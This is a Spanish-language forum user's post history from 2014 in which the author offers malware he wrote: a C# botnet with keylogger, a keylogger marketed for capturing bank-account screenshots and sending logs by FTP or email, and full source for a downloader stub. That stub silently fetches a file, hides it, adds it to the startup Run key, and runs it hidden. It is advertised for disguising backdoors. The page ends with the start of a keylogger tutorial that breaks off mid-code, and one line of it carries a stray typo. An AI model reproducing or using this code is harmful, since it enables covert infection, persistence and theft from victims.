elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ... 55
101  Programación / .NET (C#, VB.NET, ASP) / Re: [C#] DH Botnet 1.0 en: 27 Septiembre 2014, 05:11 am
solo infecta a una persona no se propaga , es algo basico , y si , viene un codigo fuente queria mostrar el codigo completo al foro pero el stub es largo para el foro.
102  Programación / .NET (C#, VB.NET, ASP) / [C#] DH Botnet 1.0 (Source) en: 26 Septiembre 2014, 19:58 pm
Traduccion a C# de mi delphi inicialmente escrita en Perl y luego en Delphi.

Tiene las siguientes opciones :

  • Ejecucion de comandos
  • Listar procesos activos
  • Matar procesos
  • Listar archivos de un directorio
  • Borrar un archivo o directorio cualquiera
  • Leer archivos
  • Abrir y cerrar lectora
  • Ocultar y mostrar programas del escritorio
  • Ocultar y mostrar Taskbar
  • Abrir Word y hacer que escriba solo (una idea muy grosa xDD)
  • Hacer que el teclado escriba solo
  • Volver loco al mouse haciendo que se mueva por la pantalla
  • Keylogger Incluido

Una imagen :



Un video con ejemplo de uso :



Los codigos en pastebin :

El Generador

El Stub

Si lo quieren bajar lo pueden hacer de aca
103  Programación / .NET (C#, VB.NET, ASP) / [C#] DH Downloader 1.0 en: 19 Septiembre 2014, 21:11 pm
Una traduccion de mi DH Downloader a C# con las siguiente opciones :

  • Se puede cambiar el nombre del archivo descargado
  • Se puede guardar en la carpeta que quieran
  • Se puede ocultar el archivo
  • Hace que el archivo se inicie cada vez que carga Windows
  • Se puede cargar oculto o normal
  • Tambien hice un generador en el que esta pensado para poner un link de descarga directa como dropbox para bajar un server en el cual tambien se le puede cambiar el icono.
  • En el generador se puede cambiar la extension del archivo bajado , ideal para camuflar backdoors en un servidor que no permite ejecutables.

Una imagen :



Los codigos :

El generador.

Código
  1. // DH Downloader 1.0
  2. // (C) Doddy Hackman 2014
  3. //
  4. // Credits :
  5. //
  6. // Based on : http://www.csharp-examples.net/download-files/
  7. //
  8. //
  9.  
  10. using System;
  11. using System.Collections.Generic;
  12. using System.ComponentModel;
  13. using System.Data;
  14. using System.Drawing;
  15. using System.Text;
  16. using System.Windows.Forms;
  17.  
  18. using System.Net;
  19. using System.IO;
  20. using Microsoft.Win32;
  21. using System.Diagnostics;
  22.  
  23. using System.Reflection;
  24.  
  25. namespace DH_Downloader
  26. {
  27.    public partial class Form1 : Form
  28.    {
  29.        public Form1()
  30.        {
  31.            InitializeComponent();
  32.        }
  33.  
  34.        string ruta_final_global = "";
  35.  
  36.        // Functions
  37.  
  38.        public string hexencode(string texto)
  39.        {
  40.            string resultado = "";
  41.  
  42.            byte[] enc = Encoding.Default.GetBytes(texto);
  43.            resultado = BitConverter.ToString(enc);
  44.            resultado = resultado.Replace("-", "");
  45.            return "0x" + resultado;
  46.        }
  47.  
  48.        public string hexdecode(string texto)
  49.        {
  50.  
  51.            // Based on : http://snipplr.com/view/36461/string-to-hex----hex-to-string-convert/
  52.            // Thanks to emregulcan
  53.  
  54.            string valor = texto.Replace("0x", "");
  55.            string retorno = "";
  56.  
  57.            while (valor.Length > 0)
  58.            {
  59.                retorno = retorno + System.Convert.ToChar(System.Convert.ToUInt32(valor.Substring(0, 2), 16));
  60.                valor = valor.Substring(2, valor.Length - 2);
  61.            }
  62.  
  63.            return retorno.ToString();
  64.  
  65.        }
  66.  
  67.        public void cmd_normal(string command)
  68.        {
  69.            try
  70.            {
  71.                System.Diagnostics.Process.Start("cmd", "/c " + command);
  72.            }
  73.            catch
  74.            {
  75.                //
  76.            }
  77.        }
  78.  
  79.        public void cmd_hide(string command)
  80.        {
  81.            try
  82.            {
  83.                ProcessStartInfo cmd_now = new ProcessStartInfo("cmd", "/c " + command);
  84.                cmd_now.RedirectStandardOutput = false;
  85.                cmd_now.WindowStyle = ProcessWindowStyle.Hidden;
  86.                cmd_now.UseShellExecute = true;
  87.                Process.Start(cmd_now);
  88.            }
  89.            catch
  90.            {
  91.                //
  92.            }
  93.        }
  94.  
  95.        public void extraer_recurso(string name, string save)
  96.        {
  97.  
  98.            // Based on : http://www.c-sharpcorner.com/uploadfile/40e97e/saving-an-embedded-file-in-C-Sharp/
  99.            // Thanks to Jean Paul
  100.  
  101.            try
  102.            {
  103.                Stream bajando_recurso = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
  104.                FileStream yacasi = new FileStream(save, FileMode.CreateNew);
  105.                for (int count = 0; count < bajando_recurso.Length; count++)
  106.                {
  107.                    byte down = Convert.ToByte(bajando_recurso.ReadByte());
  108.                    yacasi.WriteByte(down);
  109.                }
  110.                yacasi.Close();
  111.            }
  112.            catch
  113.            {
  114.                MessageBox.Show("Error unpacking resource");
  115.            }
  116.  
  117.        }
  118.  
  119.        //
  120.  
  121.        private void mephobiaButton1_Click(object sender, EventArgs e)
  122.        {
  123.            Application.Exit();
  124.        }
  125.  
  126.  
  127.        private void mephobiaButton2_Click(object sender, EventArgs e)
  128.        {
  129.  
  130.            string url = mephobiaTextBox1.Text;
  131.            string directorio_final = "";
  132.            string nombre_final = "";
  133.            string ruta_final = "";
  134.  
  135.            string directorio_dondeestamos = Path.GetDirectoryName(System.Reflection.Assembly.GetEntryAssembly().Location);
  136.  
  137.            if (mephobiaCheckBox1.Checked)
  138.            {
  139.                nombre_final = mephobiaTextBox2.Text;
  140.            }
  141.            else
  142.            {
  143.                nombre_final = Path.GetFileName(url);
  144.            }
  145.  
  146.            if (mephobiaCheckBox2.Checked)
  147.            {
  148.                directorio_final = mephobiaTextBox3.Text;
  149.            }
  150.            else
  151.            {
  152.                directorio_final = directorio_dondeestamos;
  153.            }
  154.  
  155.            ruta_final = directorio_final + "/" + nombre_final;
  156.            ruta_final_global = ruta_final;
  157.  
  158.            //MessageBox.Show(directorio_final);
  159.            //MessageBox.Show(nombre_final);
  160.            //MessageBox.Show(ruta_final);
  161.  
  162.            Directory.SetCurrentDirectory(directorio_final);
  163.  
  164.            if (File.Exists(ruta_final))
  165.            {
  166.                File.Delete(ruta_final);
  167.            }
  168.  
  169.            toolStripStatusLabel1.Text = "[+] Downloading ...";
  170.            this.Refresh();
  171.  
  172.            try
  173.            {
  174.                WebClient nave = new WebClient();
  175.                nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
  176.                nave.DownloadFileCompleted += new AsyncCompletedEventHandler(finished);
  177.                nave.DownloadProgressChanged += new DownloadProgressChangedEventHandler(ahi_vamos);
  178.                nave.DownloadFileAsync(new Uri(url), nombre_final);
  179.            }
  180.  
  181.            catch
  182.            {
  183.                //
  184.            }
  185.  
  186.  
  187.            if (mephobiaCheckBox3.Checked)
  188.            {
  189.                if (File.Exists(ruta_final))
  190.                {
  191.                    try
  192.                    {
  193.                        File.SetAttributes(ruta_final, FileAttributes.Hidden);
  194.                    }
  195.                    catch
  196.                    {
  197.                        //
  198.                    }
  199.                }
  200.            }
  201.  
  202.            if (mephobiaCheckBox4.Checked)
  203.            {
  204.                if (File.Exists(ruta_final))
  205.                {
  206.                    try
  207.                    {
  208.                        RegistryKey loadnow = Registry.LocalMachine;
  209.                        loadnow = loadnow.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
  210.                        loadnow.SetValue("uberkz", ruta_final, RegistryValueKind.String);
  211.                        loadnow.Close();
  212.                    }
  213.                    catch
  214.                    {
  215.                        //
  216.                    }
  217.                }
  218.            }
  219.  
  220.            if (mephobiaCheckBox5.Checked)
  221.            {
  222.                if (mephobiaRadiobutton1.Checked)
  223.                {
  224.                    cmd_normal("\"" + ruta_final + "\"");
  225.                }
  226.                if (mephobiaRadiobutton2.Checked)
  227.                {
  228.                    cmd_hide("\"" + ruta_final + "\"");
  229.                }
  230.  
  231.            }
  232.  
  233.        }
  234.  
  235.        private void ahi_vamos(object sender, DownloadProgressChangedEventArgs e)
  236.        {
  237.            toolStripProgressBar1.Value = e.ProgressPercentage;
  238.        }
  239.  
  240.        private void finished(object sender, AsyncCompletedEventArgs e)
  241.        {
  242.  
  243.            long tam = new System.IO.FileInfo(ruta_final_global).Length;
  244.  
  245.            if (File.Exists(ruta_final_global) && tam!=0 )
  246.            {
  247.                toolStripStatusLabel1.Text = "[+] Done";
  248.                this.Refresh();
  249.                MessageBox.Show("Downloaded");
  250.            }
  251.            else
  252.            {
  253.                toolStripStatusLabel1.Text = "[-] Error";
  254.                this.Refresh();
  255.                MessageBox.Show("Failed download");
  256.            }
  257.            toolStripProgressBar1.Value = 0;
  258.        }
  259.  
  260.        private void Form1_Load(object sender, EventArgs e)
  261.        {
  262.            toolStripProgressBar1.Value = 0;
  263.        }
  264.  
  265.        private void mephobiaButton3_Click(object sender, EventArgs e)
  266.        {
  267.  
  268.            string linea_generada = "";
  269.  
  270.            string url = mephobiaTextBox4.Text;
  271.            string opcion_change_name = "";
  272.            string text_change_name = mephobiaTextBox5.Text;
  273.            string opcion_carga_normal = "";
  274.            string opcion_carga_hide = "";
  275.            string ruta_donde_bajar = "";
  276.            string opcion_ocultar_archivo = "";
  277.            string opcion_startup = "";
  278.  
  279.            if (mephobiaCheckBox7.Checked)
  280.            {
  281.                opcion_change_name = "1";
  282.            }
  283.            else
  284.            {
  285.                opcion_change_name = "0";
  286.            }
  287.  
  288.            if (mephobiaRadiobutton3.Checked)
  289.            {
  290.                opcion_carga_normal = "1";
  291.            }
  292.            else
  293.            {
  294.                opcion_carga_normal = "0";
  295.            }
  296.  
  297.            if (mephobiaRadiobutton4.Checked)
  298.            {
  299.                opcion_carga_hide = "1";
  300.            }
  301.            else
  302.            {
  303.                opcion_carga_hide = "0";
  304.            }
  305.  
  306.            if (mephobiaComboBox1.SelectedItem != null)
  307.            {
  308.                ruta_donde_bajar = mephobiaComboBox1.SelectedItem.ToString();
  309.            }
  310.            else
  311.            {
  312.                ruta_donde_bajar = "Fuck You Bitch";
  313.            }
  314.  
  315.            if (mephobiaCheckBox6.Checked)
  316.            {
  317.                opcion_ocultar_archivo = "1";
  318.            }
  319.            else
  320.            {
  321.                opcion_ocultar_archivo = "0";
  322.            }
  323.  
  324.            if (mephobiaCheckBox8.Checked)
  325.            {
  326.                opcion_startup = "1";
  327.            }
  328.            else
  329.            {
  330.                opcion_startup = "0";
  331.            }
  332.  
  333.            extraer_recurso("DH_Downloader.Resources.stub.exe", "stub.exe");
  334.  
  335.            string check_stub = AppDomain.CurrentDomain.BaseDirectory + "/stub.exe";
  336.            string work_on_stub = AppDomain.CurrentDomain.BaseDirectory + "/done.exe";
  337.  
  338.            if (File.Exists(check_stub))
  339.            {
  340.  
  341.                if (File.Exists(work_on_stub))
  342.                {
  343.                    System.IO.File.Delete(work_on_stub);
  344.                }
  345.  
  346.                System.IO.File.Copy(check_stub, work_on_stub);
  347.  
  348.                linea_generada = "-url-" + url + "-url-" + "-opcion_change_name-" + opcion_change_name + "-opcion_change_name-" +
  349.                "-text_change_name-" + text_change_name + "-text_change_name-" + "-opcion_carga_normal-" +
  350.                opcion_carga_normal + "-opcion_carga_normal-" + "-opcion_carga_hide-" + opcion_carga_hide +
  351.                "-opcion_carga_hide-" + "-ruta_donde_bajar-" + ruta_donde_bajar + "-ruta_donde_bajar-" +
  352.                "-opcion_ocultar_archivo-" + opcion_ocultar_archivo + "-opcion_ocultar_archivo-"+"-opcion_startup-"+
  353.                opcion_startup+"-opcion_startup-";
  354.  
  355.                string generado = hexencode(linea_generada);
  356.                string linea_final = "-63686175-" + generado + "-63686175-";
  357.  
  358.                FileStream abriendo = new FileStream(work_on_stub, FileMode.Append);
  359.                BinaryWriter seteando = new BinaryWriter(abriendo);
  360.                seteando.Write(linea_final);
  361.                seteando.Flush();
  362.                seteando.Close();
  363.                abriendo.Close();
  364.  
  365.                //MessageBox.Show(generado);
  366.                //MessageBox.Show(hexdecode(generado));
  367.  
  368.                try
  369.                {
  370.                    System.IO.File.Delete(check_stub);
  371.                }
  372.                catch
  373.                {
  374.                    //
  375.                }
  376.  
  377.                MessageBox.Show("Tiny downloader Generated");
  378.  
  379.            }
  380.            else
  381.            {
  382.                MessageBox.Show("Stub not found");
  383.            }
  384.  
  385.        }
  386.    }
  387. }
  388.  
  389. // The End ?
  390.  

El Stub.

Código
  1. // DH Downloader 1.0
  2. // (C) Doddy Hackman 2014
  3. // Thanks to : http://weblogs.asp.net/jhallal/hide-the-console-window-in-quot-c-console-application-quot
  4.  
  5. using System;
  6. using System.Collections.Generic;
  7. using System.Text;
  8. using System.Diagnostics;
  9. using System.Net;
  10. using System.IO;
  11. using Microsoft.Win32;
  12.  
  13. namespace stub
  14. {
  15.  
  16.    class Program
  17.    {
  18.  
  19.        // Functions
  20.  
  21.        static public void cmd_normal(string command)
  22.        {
  23.            try
  24.            {
  25.                System.Diagnostics.Process.Start("cmd", "/c " + command);
  26.            }
  27.            catch
  28.            {
  29.                //
  30.            }
  31.        }
  32.  
  33.        static public void cmd_hide(string command)
  34.        {
  35.            try
  36.            {
  37.                ProcessStartInfo cmd_now = new ProcessStartInfo("cmd", "/c " + command);
  38.                cmd_now.RedirectStandardOutput = false;
  39.                cmd_now.WindowStyle = ProcessWindowStyle.Hidden;
  40.                cmd_now.UseShellExecute = true;
  41.                Process.Start(cmd_now);
  42.            }
  43.            catch
  44.            {
  45.                //
  46.            }
  47.        }
  48.  
  49.        static public void add_startup(string path)
  50.        {
  51.            try
  52.            {
  53.                RegistryKey loadnow = Registry.LocalMachine;
  54.                loadnow = loadnow.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
  55.                loadnow.SetValue("uberkzz", path, RegistryValueKind.String);
  56.                loadnow.Close();
  57.            }
  58.            catch
  59.            {
  60.                //
  61.            }
  62.        }
  63.  
  64.        //
  65.  
  66.        static void Main(string[] args)
  67.        {
  68.  
  69.            load_config config = new load_config();
  70.            config.load_data();
  71.            string check_online = config.downloader_online;
  72.            if (check_online == "1")
  73.            {
  74.                Console.WriteLine("[+] Downloader Online");
  75.  
  76.                string url = config.url;
  77.                string opcion_change_name = config.opcion_change_name;
  78.                string text_change_name = config.text_change_name;
  79.                string opcion_carga_normal = config.opcion_carga_normal;
  80.                string opcion_carga_hide = config.opcion_carga_hide;
  81.                string ruta_donde_bajar = config.ruta_donde_bajar;
  82.                string opcion_ocultar_archivo = config.opcion_ocultar_archivo;
  83.                string opcion_startup = config.opcion_startup;
  84.  
  85.                string nombre_final = "";
  86.                string directorio_final = "";
  87.                string ruta_final = "";
  88.  
  89.                //string output = config.get_data();
  90.                //Console.WriteLine(output);
  91.  
  92.                if (opcion_change_name == "1")
  93.                {
  94.                    nombre_final = text_change_name;
  95.                }
  96.                else
  97.                {
  98.                    nombre_final = Path.GetFileName(url);
  99.                }
  100.  
  101.                if (ruta_donde_bajar != "")
  102.                {
  103.                    directorio_final = Environment.GetEnvironmentVariable(ruta_donde_bajar);
  104.                }
  105.                else
  106.                {
  107.                    directorio_final = Environment.GetEnvironmentVariable("USERPROFILE");
  108.                }
  109.  
  110.                ruta_final = directorio_final + "/" + nombre_final;
  111.  
  112.                Console.WriteLine("[+] URL : "+url+"\n");
  113.                Console.WriteLine("[+] Filename : "+ruta_final+"\n");
  114.  
  115.                try
  116.                {
  117.                    WebClient nave = new WebClient();
  118.                    nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
  119.                    nave.DownloadFile(url, ruta_final);
  120.                }
  121.                catch
  122.                {
  123.                    //
  124.                }
  125.  
  126.                if (opcion_ocultar_archivo == "1")
  127.                {
  128.                    Console.WriteLine("[+] Hide : "+ruta_final+"\n");
  129.                    try
  130.                    {
  131.                        File.SetAttributes(ruta_final, FileAttributes.Hidden);
  132.                    }
  133.                    catch
  134.                    {
  135.                        //
  136.                    }
  137.                }
  138.  
  139.                if (opcion_startup == "1")
  140.                {
  141.                    Console.WriteLine("[+] Add Startup : "+ruta_final+"\n");
  142.                    add_startup(ruta_final);
  143.                }
  144.  
  145.                if (opcion_carga_normal == "1")
  146.                {
  147.                    Console.WriteLine("[+] Load normal : "+ruta_final+"\n");
  148.                    cmd_normal(ruta_final);
  149.                }
  150.  
  151.                if (opcion_carga_hide == "1")
  152.                {
  153.                    Console.WriteLine("[+] Load hide : "+ruta_final+"\n");
  154.                    cmd_hide(ruta_final);
  155.                }
  156.  
  157.                //Console.ReadKey();
  158.  
  159.            }
  160.            else
  161.            {
  162.                Console.WriteLine("[-] Downloader OffLine");
  163.                //Console.ReadKey();
  164.            }
  165.  
  166.        }
  167.    }
  168. }
  169.  
  170. // The End ?
  171.  

Clase load_config.cs del Stub.

Código
  1. // DH Downloader 1.0
  2. // (C) Doddy Hackman 2014
  3.  
  4. using System;
  5. using System.Collections.Generic;
  6. using System.Text;
  7.  
  8. using System.IO;
  9. using System.Text.RegularExpressions;
  10.  
  11. namespace stub
  12. {
  13.    class load_config
  14.    {
  15.        string downloader_online_config = "";
  16.        string url_config = "";
  17.        string opcion_change_name_config = "";
  18.        string text_change_name_config = "";
  19.        string opcion_carga_normal_config = "";
  20.        string opcion_carga_hide_config = "";
  21.        string ruta_donde_bajar_config = "";
  22.        string opcion_ocultar_archivo_config = "";
  23.        string opcion_startup_config = "";
  24.  
  25.        public string downloader_online
  26.        {
  27.            set { downloader_online_config = value; }
  28.            get { return downloader_online_config; }
  29.        }
  30.  
  31.        public string url
  32.        {
  33.            set { url_config = value; }
  34.            get { return url_config; }
  35.        }
  36.  
  37.        public string opcion_change_name
  38.        {
  39.            set { opcion_change_name_config = value; }
  40.            get { return opcion_change_name_config; }
  41.        }
  42.  
  43.        public string text_change_name
  44.        {
  45.            set { text_change_name_config = value; }
  46.            get { return text_change_name_config; }
  47.        }
  48.  
  49.        public string opcion_carga_normal
  50.        {
  51.            set { opcion_carga_normal_config = value; }
  52.            get { return opcion_carga_normal_config; }
  53.        }
  54.  
  55.        public string opcion_carga_hide
  56.        {
  57.            set { opcion_carga_hide_config = value; }
  58.            get { return opcion_carga_hide_config; }
  59.        }
  60.  
  61.        public string ruta_donde_bajar
  62.        {
  63.            set { ruta_donde_bajar_config = value; }
  64.            get { return ruta_donde_bajar_config; }
  65.        }
  66.  
  67.        public string opcion_ocultar_archivo
  68.        {
  69.            set { opcion_ocultar_archivo_config = value; }
  70.            get { return opcion_ocultar_archivo_config; }
  71.        }
  72.  
  73.        public string opcion_startup
  74.        {
  75.            set { opcion_startup_config = value; }
  76.            get { return opcion_startup_config; }
  77.        }
  78.  
  79.        public string hexencode(string texto)
  80.        {
  81.            string resultado = "";
  82.  
  83.            byte[] enc = Encoding.Default.GetBytes(texto);
  84.            resultado = BitConverter.ToString(enc);
  85.            resultado = resultado.Replace("-", "");
  86.            return "0x" + resultado;
  87.        }
  88.  
  89.        public string hexdecode(string texto)
  90.        {
  91.  
  92.            // Based on : http://snipplr.com/view/36461/string-to-hex----hex-to-string-convert/
  93.            // Thanks to emregulcan
  94.  
  95.            string valor = texto.Replace("0x", "");
  96.            string retorno = "";
  97.  
  98.            while (valor.Length > 0)
  99.            {
  100.                retorno = retorno + System.Convert.ToChar(System.Convert.ToUInt32(valor.Substring(0, 2), 16));
  101.                valor = valor.Substring(2, valor.Length - 2);
  102.            }
  103.  
  104.            return retorno.ToString();
  105.        }
  106.  
  107.        public load_config()
  108.        {
  109.            string downloader_online_config = "";
  110.            string url_config = "";
  111.            string opcion_change_name_config = "";
  112.            string text_change_name_config = "";
  113.            string opcion_carga_normal_config = "";
  114.            string opcion_carga_hide_config = "";
  115.            string ruta_donde_bajar_config = "";
  116.            string opcion_ocultar_archivo_config = "";
  117.            string opcion_startup_config = "";
  118.        }
  119.  
  120.        public void load_data()
  121.        {
  122.            StreamReader viendo = new StreamReader(System.Reflection.Assembly.GetEntryAssembly().Location);
  123.            string contenido = viendo.ReadToEnd();
  124.            Match regex = Regex.Match(contenido, "-63686175-(.*?)-63686175-", RegexOptions.IgnoreCase);
  125.  
  126.            if (regex.Success)
  127.            {
  128.                string comandos = regex.Groups[1].Value;
  129.                if (comandos != "" || comandos != " ")
  130.                {
  131.                    downloader_online_config = "1";
  132.                    string leyendo = hexdecode(comandos);
  133.  
  134.                    regex = Regex.Match(leyendo, "-url-(.*)-url-", RegexOptions.IgnoreCase);
  135.                    if (regex.Success)
  136.                    {
  137.                        url_config = regex.Groups[1].Value;
  138.                    }
  139.  
  140.                    regex = Regex.Match(leyendo, "-opcion_change_name-(.*)-opcion_change_name-", RegexOptions.IgnoreCase);
  141.                    if (regex.Success)
  142.                    {
  143.                        opcion_change_name_config = regex.Groups[1].Value;
  144.                    }
  145.  
  146.                    regex = Regex.Match(leyendo, "-text_change_name-(.*)-text_change_name-", RegexOptions.IgnoreCase);
  147.                    if (regex.Success)
  148.                    {
  149.                        text_change_name_config = regex.Groups[1].Value;
  150.                    }
  151.  
  152.                    regex = Regex.Match(leyendo, "-opcion_carga_normal-(.*)-opcion_carga_normal-", RegexOptions.IgnoreCase);
  153.                    if (regex.Success)
  154.                    {
  155.                        opcion_carga_normal_config = regex.Groups[1].Value;
  156.                    }
  157.  
  158.                    regex = Regex.Match(leyendo, "-opcion_carga_hide-(.*)-opcion_carga_hide-", RegexOptions.IgnoreCase);
  159.                    if (regex.Success)
  160.                    {
  161.                        opcion_carga_hide_config = regex.Groups[1].Value;
  162.                    }
  163.  
  164.                    regex = Regex.Match(leyendo, "-ruta_donde_bajar-(.*)-ruta_donde_bajar-", RegexOptions.IgnoreCase);
  165.                    if (regex.Success)
  166.                    {
  167.                        ruta_donde_bajar_config = regex.Groups[1].Value;
  168.                    }
  169.  
  170.                    regex = Regex.Match(leyendo, "-opcion_ocultar_archivo-(.*)-opcion_ocultar_archivo-", RegexOptions.IgnoreCase);
  171.                    if (regex.Success)
  172.                    {
  173.                        opcion_ocultar_archivo_config = regex.Groups[1].Value;
  174.                    }
  175.  
  176.                    regex = Regex.Match(leyendo, "-opcion_startup-(.*)-opcion_startup-", RegexOptions.IgnoreCase);
  177.                    if (regex.Success)
  178.                    {
  179.                        opcion_startup_config = regex.Groups[1].Value;
  180.                    }
  181.  
  182.                }
  183.                else
  184.                {
  185.                    downloader_online_config = "0";
  186.                }
  187.            }
  188.  
  189.        }
  190.  
  191.        public string get_data()
  192.        {
  193.            string lista = "[+] Downloader Online : " + downloader_online_config + "\n" +
  194.            "[+] URL : " + url_config +"\n" +
  195.            "[+] Option Change Name : " + opcion_change_name_config + "\n" +
  196.            "[+] Change Name to : " + text_change_name_config + "\n" +
  197.            "[+] Option normal load : " + opcion_carga_normal_config + "\n" +
  198.            "[+] Option hide load : " + opcion_carga_hide_config + "\n" +
  199.            "[+] Path : " + ruta_donde_bajar_config + "\n" +
  200.            "[+] Option hide file : " + opcion_ocultar_archivo_config + "\n" +
  201.            "[+] Option startup : " + opcion_startup_config;
  202.  
  203.            //
  204.  
  205.            return lista;
  206.        }
  207.  
  208.  
  209.    }
  210. }
  211.  
  212. // The End ?
  213.  

Un video con ejemplo de uso



Si lo quieren bajar lo pueden hacer de aca.
104  Programación / .NET (C#, VB.NET, ASP) / Re: [C#] DH KeyCagator 1.5 en: 12 Septiembre 2014, 19:26 pm
que mal , mi avast no lanzo nada raro cuando lo hacia xD pero es normal que detecte al generador con los recursos y el stub que usa el API de Windows.
105  Programación / .NET (C#, VB.NET, ASP) / [C#] DH KeyCagator 1.5 en: 12 Septiembre 2014, 18:01 pm
Version de mi keylogger KeyCagator en C# , originalmente escrito en Delphi y Perl , basicamente es solo una traduccion pero tambien le agregue unas opciones nuevas.

Opciones :

  • Captura las teclas minusculas como mayusculas , asi como numeros y las demas teclas
  • Captura el nombre de la ventana actual
  • Captura la pantalla
  • Logs ordenados en un archivo HTML
  • Se puede elegir el directorio en el que se guardan los Logs
  • Se envia los logs por FTP
  • Se oculta los rastros
  • Se carga cada vez que inicia Windows
  • Se puede usar shift+F9 para cargar los logs en la maquina infectada
  • Tambien hice un generador del keylogger que ademas permite ver los logs que estan en el servidor FTP que se usa para el keylogger

Mejoras :

  • El keylogger oculto en la computadora de la victima tiene una ventana oculta con password para manejar o cambiar las opciones del keylogger aclaradas en el stub.
  • A peticiones de varios usuarios le agregue la opcion de poder capturar un screenshot cuando se detecte el click del mouse en una ventana especifica , esto es usado mucho para las cuentas de banco y no hay muchos keyloggers en ningun lenguaje que te regalen el codigo de esta forma.
  • Posibilidad de enviar los logs comodamente a tu cuenta de correo.
  • El stub pesa mucho menos que la version en Delphi

Unas imagenes :







Un video con ejemplo de uso :



Si lo quieren bajar lo pueden hacer de aca con codigo incluido.
106  Programación / .NET (C#, VB.NET, ASP) / [C#] Creacion de un Keylogger en: 5 Septiembre 2014, 18:38 pm
[Titulo] : Creacion de un Keylogger
[Lenguaje] : C#
[Autor] : Doddy Hackman

[Temario]

-- =================--------

0x01 : Introduccion
0x02 : Capturar Teclas
0x03 : Capturar el nombre de las ventanas activas
0x04 : Tomar un ScreenShot de la pantalla
0x05 : Subir logs a un servidor FTP
0x06 : Mandar logs por Mail
0x07 : Probando el programa

-- =================--------

0x01 : Introduccion

Hola , hoy les traigo un manual sobre como hacer un keylogger en C# , en este manual les voy a enseñar o por lo menos lo voy a intentar sobre como capturar las teclas , nombres de las ventanas , tomar un screenshot de la pantalla para despues mandar los logs por Mail (usando Gmail) o subirlos a un servidor FTP.

Empecemos ...

Para empezar el keyloger tenemos que crear primero un nuevo proyecto de la siguiente forma :

Archivo -> Nuevo -> Proyecto -> Elegimos Aplicacion de Windows Forms y le damos en aceptar

Como en la siguiente imagen :



Una vez creado el proyecto vamos hacer el formulario completo para hacerlo de una para esto tienen que usar :

Los primeros 6 botones con el texto del boton :

Boton 1 - "Capture Keys ON"
Boton 2 - "Capture Keys OFF"

Boton 3 - "Capture Windows ON"
Boton 4 - "Capture Windows OFF"

Boton 5 - "Capture Screen ON"
Boton 6 - "Capture Screen OFF"

Ahora pongan 3 labels con el texto de "OFF" abajo de cada funcion : keys,windows,screen.

Para terminar pongan dos botones finales con el siguiente texto :

Boton 7 - "Send logs for FTP"
Boton 8 - "Send logs for Mail"

Quedando algo asi :



Si quieren pueden ponerle como texto "Keylogger in C#" al formulario como en la imagen pero no es importante.

0x02 : Capturar Teclas

Para poder capturar teclas necesitan poner este "using" al inicio del codigo para poder usar GetAsyncKeyState() :
 
Código
  1. using System.Runtime.InteropServices;
  2.  

Despues lo mas importante es agregar estas lineas despues de los "using" :

Código
  1.        [DllImport("User32.dll")]
  2.        private static extern short GetAsyncKeyState(Keys teclas);
  3.        [DllImport("user32.dll")]
  4.        private static extern short GetAsyncKeyState(Int32 teclas);
  5.        [DllImport("user32.dll")]
  6.        private static extern short GetKeyState(Keys teclas);
  7.        [DllImport("user32.dll")]
  8.        private static extern short GetKeyState(Int32 teclas);
  9.  

Para poder escribir los logs en un html necesitan usar mi funcion traducida originalmente desde perl a python,ruby,delphi y finalmente C# :

Código
  1.        public void savefile(string file, string texto)
  2.        {
  3.            //Function savefile() Coded By Doddy Hackman
  4.            try
  5.            {
  6.                System.IO.StreamWriter save = new System.IO.StreamWriter(file, true); // Abrimos para escribir en el archivo marcado
  7.                save.Write(texto); // Escribimos en el archivo marcado con lo que hay en la variable texto
  8.                save.Close(); // Cerramos el archivo
  9.            }
  10.            catch
  11.            {
  12.                //
  13.            }
  14.        }
  15.  

Ahora tenemos que agregar el primer timer al formulario solo van al cuadro de herramientas y lo arrastran al formulario.
Como va a ser el primero timer tendra el name de timer1 , entonces hacemos doble click timer1 para agregar el siguiente codigo.

Código
  1.        private void timer1_Tick(object sender, EventArgs e)
  2.        {
  3.  
  4.            // Keylogger Based on http://www.blackstuff.net/f44/c-keylogger-4848/
  5.            // Thanks to Carlos Raposo
  6.  
  7.            for (int num = 0; num <= 255; num++) // Usamos el int num para recorrer los numeros desde el 0 al 255
  8.            {
  9.                int numcontrol = GetAsyncKeyState(num);  // Usamos GetAsyncKeyState para verificar si una tecla fue presionada usando el int numcontrol  
  10.                if (numcontrol == -32767) // Verificamos si numcontrol fue realmente presionado controlando que numcontrol sea -32767  
  11.                {
  12.                    if (num >= 65 && num <= 122) // Si el int num esta entre 65 y 122 ...
  13.                    {
  14.                        if (Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey)) && Convert.ToBoolean(GetKeyState(Keys.CapsLock)))
  15.                        {
  16.                            // Si se detecta Shift y CapsLock ...
  17.                            string letra = Convert.ToChar(num+32).ToString(); // Le sumamos 32 a num y la convertimos a Char para formar la letra minuscula
  18.                            savefile("logs.html", letra); // Agregamos la letra al archivo de texto
  19.                        }
  20.                        else if (Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey)))
  21.                        {
  22.                            // Si se detecta Shift o CapsLock
  23.                            string letra = Convert.ToChar(num).ToString(); // Formamos la letra convirtiendo num a Char
  24.                            savefile("logs.html", letra); // Agregamos la letra al archivo de texto
  25.                        }
  26.                        else if (Convert.ToBoolean(GetKeyState(Keys.CapsLock)))
  27.                        {
  28.                            // Si se detecta CapsLock ...
  29.                            string letra = Convert.ToChar(num).ToString(); // Formamos la letra convirtiendo num a Char
  30.                            savefile("logs.html", letra); // Agregamos la letra al archivo de texto
  31.  
  32.                        }
  33.                        else
  34.                        {
  35.                            // Si no se detecta ni Shift ni CapsLock ...
  36.                            string letra = Convert.ToChar(num j+ 32).ToString(); // Formamos la letra minuscula sumandole 32 a num y convirtiendo num a Char
  37.                            savefile("logs.html", letra); // Agregamos la letra al archivo de texto
  38.                        }
  39.                    }
  40.  
